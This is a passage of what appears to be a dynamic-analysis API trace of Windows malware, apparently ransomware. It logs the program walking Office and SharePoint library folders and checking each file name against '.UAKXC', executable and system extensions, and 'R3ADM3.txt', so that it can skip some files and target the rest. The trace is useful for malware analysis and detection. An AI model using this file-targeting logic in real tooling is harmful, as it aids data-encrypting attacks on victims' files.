nFileSizeLow=0x8a780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.BusinessApplications.Runtime.dll", cAlternateFileName="MI2E5E~1.DLL")) returned 1 [0159.357] lstrcmpW (lpString1="Microsoft.Office.BusinessApplications.Runtime.dll", lpString2=".") returned 1 [0159.357] lstrcmpW (lpString1="Microsoft.Office.BusinessApplications.Runtime.dll", lpString2="..") returned 1 [0159.357] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.Runtime.dll", lpSrch=".UAKXC") returned 0x0 [0159.357] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.Runtime.dll", lpSrch=".exe") returned 0x0 [0159.357] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.Runtime.dll", lpSrch=".dll") returned=".dll" [0159.357] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe853200, ftCreationTime.dwHighDateTime=0x1ca24ae, ftLastAccessTime.dwLowDateTime=0x568a2e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe853200, ftLastWriteTime.dwHighDateTime=0x1ca24ae, nFileSizeHigh=0x0, nFileSizeLow=0x295c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.BusinessApplications.Runtime.xml", cAlternateFileName="MICROS~3.XML")) returned 1 [0159.357] lstrcmpW (lpString1="Microsoft.Office.BusinessApplications.Runtime.xml", lpString2=".") returned 1 [0159.357] lstrcmpW (lpString1="Microsoft.Office.BusinessApplications.Runtime.xml", lpString2="..") returned 1 [0159.357] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.Runtime.xml", lpSrch=".UAKXC") returned 0x0 [0159.357] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.Runtime.xml", lpSrch=".exe") returned 0x0 [0159.357] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.Runtime.xml", lpSrch=".dll") returned 0x0 [0159.357] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.Runtime.xml", lpSrch=".lnk") returned 0x0 [0159.357] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.Runtime.xml", lpSrch=".sys") returned 0x0 [0159.357] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.Runtime.xml", lpSrch=".msi") returned 0x0 [0159.357] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.Runtime.xml", lpSrch="R3ADM3.txt") returned 0x0 [0159.357] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xefa190 [0159.357] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.357] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.357] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xf811c0 [0159.357] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.357] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.357] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefa190 | out: hHeap=0xea0000) returned 1 [0159.357] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xf81288 [0159.358] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77922c8 [0159.358] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xf81418 [0159.358] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf81288 | out: hHeap=0xea0000) returned 1 [0159.358] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0159.358] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ad79f00, ftCreationTime.dwHighDateTime=0x1cac1f4, ftLastAccessTime.dwLowDateTime=0x67a61010, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ad79f00, ftLastWriteTime.dwHighDateTime=0x1cac1f4, nFileSizeHigh=0x0, nFileSizeLow=0xa2780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.BusinessApplications.RuntimeUi.dll", cAlternateFileName="MIBA26~1.DLL")) returned 1 [0159.358] lstrcmpW (lpString1="Microsoft.Office.BusinessApplications.RuntimeUi.dll", lpString2=".") returned 1 [0159.358] lstrcmpW (lpString1="Microsoft.Office.BusinessApplications.RuntimeUi.dll", lpString2="..") returned 1 [0159.358] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.RuntimeUi.dll", lpSrch=".UAKXC") returned 0x0 [0159.358] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.RuntimeUi.dll", lpSrch=".exe") returned 0x0 [0159.358] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.RuntimeUi.dll", lpSrch=".dll") returned=".dll" [0159.358] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd33c3f00, ftCreationTime.dwHighDateTime=0x1ca2551, ftLastAccessTime.dwLowDateTime=0x67a61010, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd33c3f00, ftLastWriteTime.dwHighDateTime=0x1ca2551, nFileSizeHigh=0x0, nFileSizeLow=0xb2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.BusinessApplications.RuntimeUi.xml", cAlternateFileName="MI8366~1.XML")) returned 1 [0159.358] lstrcmpW (lpString1="Microsoft.Office.BusinessApplications.RuntimeUi.xml", lpString2=".") returned 1 [0159.358] lstrcmpW (lpString1="Microsoft.Office.BusinessApplications.RuntimeUi.xml", lpString2="..") returned 1 [0159.358] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.RuntimeUi.xml", lpSrch=".UAKXC") returned 0x0 [0159.358] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.RuntimeUi.xml", lpSrch=".exe") returned 0x0 [0159.358] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.RuntimeUi.xml", lpSrch=".dll") returned 0x0 [0159.358] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.RuntimeUi.xml", lpSrch=".lnk") returned 0x0 [0159.358] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.RuntimeUi.xml", lpSrch=".sys") returned 0x0 [0159.358] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.RuntimeUi.xml", lpSrch=".msi") returned 0x0 [0159.358] StrStrIW (lpFirst="Microsoft.Office.BusinessApplications.RuntimeUi.xml", lpSrch="R3ADM3.txt") returned 0x0 [0159.358] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xefa190 [0159.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xf811c0 [0159.359] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.359] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.359] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefa190 | out: hHeap=0xea0000) returned 1 [0159.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xf81288 [0159.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77922f0 [0159.359] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xf814e0 [0159.359] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf81288 | out: hHeap=0xea0000) returned 1 [0159.359] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0159.359] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ad79f00, ftCreationTime.dwHighDateTime=0x1cac1f4, ftLastAccessTime.dwLowDateTime=0x575e0870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ad79f00, ftLastWriteTime.dwHighDateTime=0x1cac1f4, nFileSizeHigh=0x0, nFileSizeLow=0xe9780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.BusinessData.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0159.359] lstrcmpW (lpString1="Microsoft.Office.BusinessData.dll", lpString2=".") returned 1 [0159.359] lstrcmpW (lpString1="Microsoft.Office.BusinessData.dll", lpString2="..") returned 1 [0159.359] StrStrIW (lpFirst="Microsoft.Office.BusinessData.dll", lpSrch=".UAKXC") returned 0x0 [0159.359] StrStrIW (lpFirst="Microsoft.Office.BusinessData.dll", lpSrch=".exe") returned 0x0 [0159.359] StrStrIW (lpFirst="Microsoft.Office.BusinessData.dll", lpSrch=".dll") returned=".dll" [0159.359] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe853200, ftCreationTime.dwHighDateTime=0x1ca24ae, ftLastAccessTime.dwLowDateTime=0x575e0870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe853200, ftLastWriteTime.dwHighDateTime=0x1ca24ae, nFileSizeHigh=0x0, nFileSizeLow=0x33737, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.BusinessData.xml", cAlternateFileName="MICROS~4.XML")) returned 1 [0159.359] lstrcmpW (lpString1="Microsoft.Office.BusinessData.xml", lpString2=".") returned 1 [0159.359] lstrcmpW (lpString1="Microsoft.Office.BusinessData.xml", lpString2="..") returned 1 [0159.359] StrStrIW (lpFirst="Microsoft.Office.BusinessData.xml", lpSrch=".UAKXC") returned 0x0 [0159.359] StrStrIW (lpFirst="Microsoft.Office.BusinessData.xml", lpSrch=".exe") returned 0x0 [0159.359] StrStrIW (lpFirst="Microsoft.Office.BusinessData.xml", lpSrch=".dll") returned 0x0 [0159.359] StrStrIW (lpFirst="Microsoft.Office.BusinessData.xml", lpSrch=".lnk") returned 0x0 [0159.360] StrStrIW (lpFirst="Microsoft.Office.BusinessData.xml", lpSrch=".sys") returned 0x0 [0159.360] StrStrIW (lpFirst="Microsoft.Office.BusinessData.xml", lpSrch=".msi") returned 0x0 [0159.360] StrStrIW (lpFirst="Microsoft.Office.BusinessData.xml", lpSrch="R3ADM3.txt") returned 0x0 [0159.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3658 [0159.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5ff8 [0159.360] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.360] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.360] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3658 | out: hHeap=0xea0000) returned 1 [0159.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5f50 [0159.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792318 [0159.360] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef5ea8 [0159.360] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5f50 | out: hHeap=0xea0000) returned 1 [0159.360] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5ff8 | out: hHeap=0xea0000) returned 1 [0159.360] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0139200, ftCreationTime.dwHighDateTime=0x1cacf2a, ftLastAccessTime.dwLowDateTime=0x64dbf390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd0139200, ftLastWriteTime.dwHighDateTime=0x1cacf2a, nFileSizeHigh=0x0, nFileSizeLow=0x4998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.InfoPath.Client.Internal.CLRHost.dll", cAlternateFileName="MI6145~1.DLL")) returned 1 [0159.360] lstrcmpW (lpString1="Microsoft.Office.InfoPath.Client.Internal.CLRHost.dll", lpString2=".") returned 1 [0159.360] lstrcmpW (lpString1="Microsoft.Office.InfoPath.Client.Internal.CLRHost.dll", lpString2="..") returned 1 [0159.360] StrStrIW (lpFirst="Microsoft.Office.InfoPath.Client.Internal.CLRHost.dll", lpSrch=".UAKXC") returned 0x0 [0159.360] StrStrIW (lpFirst="Microsoft.Office.InfoPath.Client.Internal.CLRHost.dll", lpSrch=".exe") returned 0x0 [0159.360] StrStrIW (lpFirst="Microsoft.Office.InfoPath.Client.Internal.CLRHost.dll", lpSrch=".dll") returned=".dll" [0159.361] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdb13800, ftCreationTime.dwHighDateTime=0x1cacf2a, ftLastAccessTime.dwLowDateTime=0x543977b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcdb13800, ftLastWriteTime.dwHighDateTime=0x1cacf2a, nFileSizeHigh=0x0, nFileSizeLow=0xa780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.InfoPath.FormControl.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0159.361] lstrcmpW (lpString1="Microsoft.Office.InfoPath.FormControl.dll", lpString2=".") returned 1 [0159.361] lstrcmpW (lpString1="Microsoft.Office.InfoPath.FormControl.dll", lpString2="..") returned 1 [0159.361] StrStrIW (lpFirst="Microsoft.Office.InfoPath.FormControl.dll", lpSrch=".UAKXC") returned 0x0 [0159.361] StrStrIW (lpFirst="Microsoft.Office.InfoPath.FormControl.dll", lpSrch=".exe") returned 0x0 [0159.361] StrStrIW (lpFirst="Microsoft.Office.InfoPath.FormControl.dll", lpSrch=".dll") returned=".dll" [0159.361] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0139200, ftCreationTime.dwHighDateTime=0x1cacf2a, ftLastAccessTime.dwLowDateTime=0x61e95fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd0139200, ftLastWriteTime.dwHighDateTime=0x1cacf2a, nFileSizeHigh=0x0, nFileSizeLow=0x63790, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.Interop.InfoPath.SemiTrust.dll", cAlternateFileName="MIE42F~1.DLL")) returned 1 [0159.361] lstrcmpW (lpString1="Microsoft.Office.Interop.InfoPath.SemiTrust.dll", lpString2=".") returned 1 [0159.361] lstrcmpW (lpString1="Microsoft.Office.Interop.InfoPath.SemiTrust.dll", lpString2="..") returned 1 [0159.361] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.SemiTrust.dll", lpSrch=".UAKXC") returned 0x0 [0159.361] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.SemiTrust.dll", lpSrch=".exe") returned 0x0 [0159.361] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.SemiTrust.dll", lpSrch=".dll") returned=".dll" [0159.361] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d265900, ftCreationTime.dwHighDateTime=0x1ca5630, ftLastAccessTime.dwLowDateTime=0x542d90d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8d265900, ftLastWriteTime.dwHighDateTime=0x1ca5630, nFileSizeHigh=0x0, nFileSizeLow=0xc5265, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.Interop.InfoPath.SemiTrust.xml", cAlternateFileName="MICROS~1.XML")) returned 1 [0159.361] lstrcmpW (lpString1="Microsoft.Office.Interop.InfoPath.SemiTrust.xml", lpString2=".") returned 1 [0159.361] lstrcmpW (lpString1="Microsoft.Office.Interop.InfoPath.SemiTrust.xml", lpString2="..") returned 1 [0159.361] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.SemiTrust.xml", lpSrch=".UAKXC") returned 0x0 [0159.361] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.SemiTrust.xml", lpSrch=".exe") returned 0x0 [0159.361] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.SemiTrust.xml", lpSrch=".dll") returned 0x0 [0159.361] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.SemiTrust.xml", lpSrch=".lnk") returned 0x0 [0159.361] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.SemiTrust.xml", lpSrch=".sys") returned 0x0 [0159.362] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.SemiTrust.xml", lpSrch=".msi") returned 0x0 [0159.362] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.SemiTrust.xml", lpSrch="R3ADM3.txt") returned 0x0 [0159.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec9d8 [0159.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xf811c0 [0159.362] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec9d8 | out: hHeap=0xea0000) returned 1 [0159.362] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.362] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xf81288 [0159.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792340 [0159.362] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xf815a8 [0159.362] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf81288 | out: hHeap=0xea0000) returned 1 [0159.362] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf811c0 | out: hHeap=0xea0000) returned 1 [0159.362] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0139200, ftCreationTime.dwHighDateTime=0x1cacf2a, ftLastAccessTime.dwLowDateTime=0x561caed0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd0139200, ftLastWriteTime.dwHighDateTime=0x1cacf2a, nFileSizeHigh=0x0, nFileSizeLow=0x15780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.Interop.InfoPath.Xml.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0159.362] lstrcmpW (lpString1="Microsoft.Office.Interop.InfoPath.Xml.dll", lpString2=".") returned 1 [0159.362] lstrcmpW (lpString1="Microsoft.Office.Interop.InfoPath.Xml.dll", lpString2="..") returned 1 [0159.362] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.Xml.dll", lpSrch=".UAKXC") returned 0x0 [0159.362] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.Xml.dll", lpSrch=".exe") returned 0x0 [0159.362] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.Xml.dll", lpSrch=".dll") returned=".dll" [0159.362] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62def200, ftCreationTime.dwHighDateTime=0x1c9bc30, ftLastAccessTime.dwLowDateTime=0x65d38290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x62def200, ftLastWriteTime.dwHighDateTime=0x1c9bc30, nFileSizeHigh=0x0, nFileSizeLow=0x837d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.Interop.InfoPath.Xml.xml", cAlternateFileName="MI4026~1.XML")) returned 1 [0159.362] lstrcmpW (lpString1="Microsoft.Office.Interop.InfoPath.Xml.xml", lpString2=".") returned 1 [0159.362] lstrcmpW (lpString1="Microsoft.Office.Interop.InfoPath.Xml.xml", lpString2="..") returned 1 [0159.363] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.Xml.xml", lpSrch=".UAKXC") returned 0x0 [0159.363] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.Xml.xml", lpSrch=".exe") returned 0x0 [0159.363] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.Xml.xml", lpSrch=".dll") returned 0x0 [0159.363] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.Xml.xml", lpSrch=".lnk") returned 0x0 [0159.363] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.Xml.xml", lpSrch=".sys") returned 0x0 [0159.363] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.Xml.xml", lpSrch=".msi") returned 0x0 [0159.363] StrStrIW (lpFirst="Microsoft.Office.Interop.InfoPath.Xml.xml", lpSrch="R3ADM3.txt") returned 0x0 [0159.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec9d8 [0159.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb0) returned 0xeccf70 [0159.363] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec9d8 | out: hHeap=0xea0000) returned 1 [0159.363] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.363] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb0) returned 0x7770008 [0159.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792368 [0159.363] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb0) returned 0xee3d98 [0159.363] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7770008 | out: hHeap=0xea0000) returned 1 [0159.363] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeccf70 | out: hHeap=0xea0000) returned 1 [0159.363] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x102e00, ftCreationTime.dwHighDateTime=0x1cab7e3, ftLastAccessTime.dwLowDateTime=0x853ab920, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x102e00, ftLastWriteTime.dwHighDateTime=0x1cab7e3, nFileSizeHigh=0x0, nFileSizeLow=0x12798, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", cAlternateFileName="MIAE71~1.DLL")) returned 1 [0159.363] lstrcmpW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2=".") returned 1 [0159.363] lstrcmpW (lpString1="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpString2="..") returned 1 [0159.364] StrStrIW (lpFirst="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpSrch=".UAKXC") returned 0x0 [0159.364] StrStrIW (lpFirst="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpSrch=".exe") returned 0x0 [0159.364] StrStrIW (lpFirst="Microsoft.Office.Interop.Visio.WorkflowAuthoring.dll", lpSrch=".dll") returned=".dll" [0159.364] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa52c0600, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x853ab920, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa52c0600, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x67760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="microsoft.office.workflow.actions.proxy.dll", cAlternateFileName="MIF37A~1.DLL")) returned 1 [0159.364] lstrcmpW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2=".") returned 1 [0159.364] lstrcmpW (lpString1="microsoft.office.workflow.actions.proxy.dll", lpString2="..") returned 1 [0159.364] StrStrIW (lpFirst="microsoft.office.workflow.actions.proxy.dll", lpSrch=".UAKXC") returned 0x0 [0159.364] StrStrIW (lpFirst="microsoft.office.workflow.actions.proxy.dll", lpSrch=".exe") returned 0x0 [0159.364] StrStrIW (lpFirst="microsoft.office.workflow.actions.proxy.dll", lpSrch=".dll") returned=".dll" [0159.364] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17441800, ftCreationTime.dwHighDateTime=0x1cac1f4, ftLastAccessTime.dwLowDateTime=0x5687ccb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17441800, ftLastWriteTime.dwHighDateTime=0x1cac1f4, nFileSizeHigh=0x0, nFileSizeLow=0x7d780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.SharePoint.BusinessData.Administration.Client.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0159.364] lstrcmpW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2=".") returned 1 [0159.364] lstrcmpW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpString2="..") returned 1 [0159.364] StrStrIW (lpFirst="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpSrch=".UAKXC") returned 0x0 [0159.364] StrStrIW (lpFirst="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpSrch=".exe") returned 0x0 [0159.364] StrStrIW (lpFirst="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpSrch=".dll") returned=".dll" [0159.364] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe853200, ftCreationTime.dwHighDateTime=0x1ca24ae, ftLastAccessTime.dwLowDateTime=0x5687ccb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe853200, ftLastWriteTime.dwHighDateTime=0x1ca24ae, nFileSizeHigh=0x0, nFileSizeLow=0x311b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.SharePoint.BusinessData.Administration.Client.xml", cAlternateFileName="MICROS~2.XML")) returned 1 [0159.366] lstrcmpW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2=".") returned 1 [0159.366] lstrcmpW (lpString1="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpString2="..") returned 1 [0159.366] StrStrIW (lpFirst="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpSrch=".UAKXC") returned 0x0 [0159.366] StrStrIW (lpFirst="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpSrch=".exe") returned 0x0 [0159.366] StrStrIW (lpFirst="Microsoft.SharePoint.BusinessData.Administration.Client.xml", lpSrch=".dll") returned 0x0 [0159.366] 